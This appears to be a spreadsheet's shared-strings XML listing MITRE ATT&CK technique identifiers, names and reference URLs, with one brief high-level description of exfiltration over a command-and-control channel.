https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>T1557.004</t>
  </si>
  <si>
    <t>Evil Twin</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1557/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1620</t>
  </si>
  <si>
    <t>T1016.002</t>
  </si>
  <si>
    <t>Wi-Fi Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1016/002</t>
  </si>
  <si>
    <t>T1480.002</t>
  </si>
  <si>
    <t>Mutual Exclusion</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</si>
  <si>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
https://attack.mitre.org/techniques/T1480/002</t>
  </si>
  <si>
    <t>T1564.011</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1497/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1563/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1029</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</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</si>
  <si>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https://attack.mitre.org/techniques/T1572</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1597/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1602/002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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</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</si>
  <si>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
https://attack.mitre.org/techniques/T1560</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1553/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1185</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>T1556.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/007</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>T1059.009</t>
  </si>
  <si>
    <t>Cloud API</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1059/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1218.015</t>
  </si>
  <si>
    <t>Electron Applications</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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/015</t>
  </si>
  <si>
    <t>T1562.012</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/006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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1610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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1543/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1580</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1555/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1491</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1557/003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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Web Shell</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</si>
  <si>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
https://attack.mitre.org/techniques/T1505/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1484/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1217</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Server</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</si>
  <si>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https://attack.mitre.org/techniques/T1583/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1011/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>T1136.001</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</si>
  <si>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
https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</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</si>
  <si>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https://attack.mitre.org/techniques/T1092</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>T1585.002</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</si>
  <si>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https://attack.mitre.org/techniques/T1585/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1557/001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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1595</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1110/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>T1598.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1598/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1003/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>T1548.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1016</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>T1593.003</t>
  </si>
  <si>
    <t>Code Repositories</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1593/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>T1496.002</t>
  </si>
  <si>
    <t>Bandwidth Hijacking</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</si>
  <si>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
https://attack.mitre.org/techniques/T1496/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/006</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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1589/003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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1482</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</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</si>
  <si>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https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>T1588.001</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</si>
  <si>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https://attack.mitre.org/techniques/T1588/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1542/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1048/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>T1583.003</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</si>
  <si>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https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1213/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1550/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1609</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1083</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1568</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1020/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1647</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1114/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1074</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1649</t>
  </si>
  <si>
    <t>T1098.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</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</si>
  <si>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
https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1600/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/002</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1218/012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>T1584.005</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</si>
  <si>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https://attack.mitre.org/techniques/T1584/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>T1562.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/010</t>
  </si>
  <si>
    <t>T1559.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1559/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</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</si>
  <si>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
https://attack.mitre.org/techniques/T1102</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1568/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
    <t>T1547.015</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/015</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1104</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1657</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1480</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1619</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1606/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1654</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</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</si>
  <si>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https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>T1021.007</t>
  </si>
  <si>
    <t>Cloud Services</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1021/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>T1027.012</t>
  </si>
  <si>
    <t>LNK Icon Smuggling</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/012</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1528</t>
  </si>
  <si>
    <t>T1598.002</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</si>
  <si>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https://attack.mitre.org/techniques/T1598/002</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1134/003</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Group Policy Preferences</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1048/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</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</si>
  <si>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https://attack.mitre.org/techniques/T1057</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>T1556.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t>T1496.004</t>
  </si>
  <si>
    <t>Cloud Service Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1496/004</t>
  </si>
  <si>
    <t>T1585.003</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1585/003</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</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</si>
  <si>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https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
https://attack.mitre.org/techniques/T1041</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1591</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1606</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1621</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Host Software Binary</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</si>
  <si>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https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>T1552.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/008</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1071/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1212</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</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</si>
  <si>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
https://attack.mitre.org/techniques/T1534</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1199</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1136/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1069/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1593</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1098</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1048</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>GUI Input Capture</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</si>
  <si>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https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>T1574.013</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/013</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>T1496.001</t>
  </si>
  <si>
    <t>Compute Hijacking</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</si>
  <si>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https://attack.mitre.org/techniques/T1496/001</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/005</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Multi-hop Proxy</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</si>
  <si>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
https://attack.mitre.org/techniques/T1090/003</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</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</si>
  <si>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https://attack.mitre.org/techniques/T1110</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1137/003</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>T1584.006</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</si>
  <si>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https://attack.mitre.org/techniques/T1584/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1601</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>T1059.011</t>
  </si>
  <si>
    <t>Lua</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</si>
  <si>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https://attack.mitre.org/techniques/T1059/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/005</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>T1543.005</t>
  </si>
  <si>
    <t>Container Service</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</si>
  <si>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
https://attack.mitre.org/techniques/T1543/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1078</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1571</t>
  </si>
  <si>
    <t>T1585.001</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</si>
  <si>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https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1068</t>
  </si>
  <si>
    <t>T1564.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1531</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</si>
  <si>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</si>
  <si>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</si>
